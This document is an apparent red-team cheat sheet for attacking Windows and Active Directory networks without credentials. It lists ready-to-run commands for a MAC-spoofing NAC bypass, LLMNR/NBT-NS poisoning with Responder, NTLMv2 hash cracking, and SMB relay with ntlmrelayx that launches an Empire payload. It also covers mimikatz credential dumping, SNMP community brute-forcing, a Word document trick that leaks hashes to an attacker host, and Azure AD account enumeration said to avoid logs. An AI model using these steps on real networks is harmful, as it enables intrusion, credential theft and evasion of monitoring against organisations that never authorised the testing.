Out of Domain (No credentials)

Identification

# Passiv network listening to identify machines
# By default, it uses interactive mode (incompatible with clean output)
# You can use the -P option to get off interactive
sudo netdiscover -p -i eth0
sudo netdiscover -p -i eth0 -P

# You can find the domain big using dig
dig -x IP

# If the NAC is blocking, you can listen broadcast and collect MAC address
# Use printer's MAC address to bypass NAC


LLMNR / NBT-NS

# You can Man in The Middle using LLMNR and NBT-NS if they're bad configured
sudo responder -I eth0 -wFv

# If you get hashes, will be necessary to crack them
john --format=netntlmv2 --wordlist="/usr/share/wordlists/rockyou.txt" hash.txt 


Responder and Multirelay

# You can link responder and multi relay to own machines

# It's important to know that SMB Signing must be disabled on machines for multirelay.
# SMB Server must also be off on Responder. Responder will intercept and MultiRelay will relay hashes

# HTTP and SMB are OFF in Responder.conf
responder -I eth0 -rv
responder -I <interface> -r -d -w

# All captured hashes are stored and can be retrieved using the DumpHash.py script
$ sudo python DumpHash.py
# You can check for machines with disabled SMB Signing with RunFinger (impacket) or CrackMapExec
python RunFinger.py -i 10.0.2.0/24
cme smb <CIDR> --gen-relay-list targets.txt

# Then you will target one machine or one range for MultiRelay
python MultiRelay.py -t 10.0.2.4 -u ALL
ntlmrelayx.py -tf targets.txt
ntlmrelayx.py -tf targets.txt -c <insert your Empire Powershell launcher here>

# Then you can pop an interactive shell
# And use for example mimikatz
mimi sekurlsa::logonpasswords


NTLM Relaying and Proxychains

# Using socks settings in case of multiple sessions to handle
# you can specify a target like this all://10.1.2.10
# It will target smb://’, ‘mssql://’, ‘http://’, ‘https://’, ‘imap://’, ‘imaps://’, ‘ldap://’, ‘ldaps://’ and ‘smtp://’
./ntlmrelayx.py -tf /tmp/targets.txt -socks -smb2support

# HTTP and SMB are OFF in Responder.conf
responder -I eth0 -rv
responder -I <interface> -r -d -w

# If someone connects and is relayed
# You can see sessions
ntlmrelayx> socks

# To use sessions, proxychains can be set up
# /etc/proxychains.conf must be pointing toward the target host

# Then you can use different tools to interact
# For example, connect through SMB
# If password asked, whatever
proxychains smbclient //192.168.48.230/Users -U contoso/normaluser1
proxychains ./mssqlclient.py contoso/normaluser1@192.168.48.230 -windows-auth


SNMP Communities

# You can use metasploit to enumerate known SNMP communities
auxiliary/scanner/snmp/snmp_enum

# OneSixtyOne is another tool
onesixtyone <target> public

# Bruteforce using a dict
onesixtyone -c wordlist <target>

# Or you can use snmp-check
snmp-check -t 192.168.1.2 -c public/private


Phishing with Responder

# Open Word -> CTRL + F9
# IMPORT "\\\\Responder-IP\\1.jpg"
# Right click and select "Edit Field"
# Tick "Data not stored in document"
# Save & close.
# Open the document -> free credentials :)


Azure AD Recon

https://www.synacktiv.com/posts/pentest/azure-ad-introduction-for-red-teamers.html

# https://login.microsoftonline.com/getuserrealm.srf?login=username@gothamlab.onmicrosoft.com&xml=1
# If the NameSpaceType indicates "Managed", then the company is using Azure AD. 

# Discover accounts
# o365creeper can be used, it does not produce logs on the AD side
https://github.com/LMGsec/o365creeper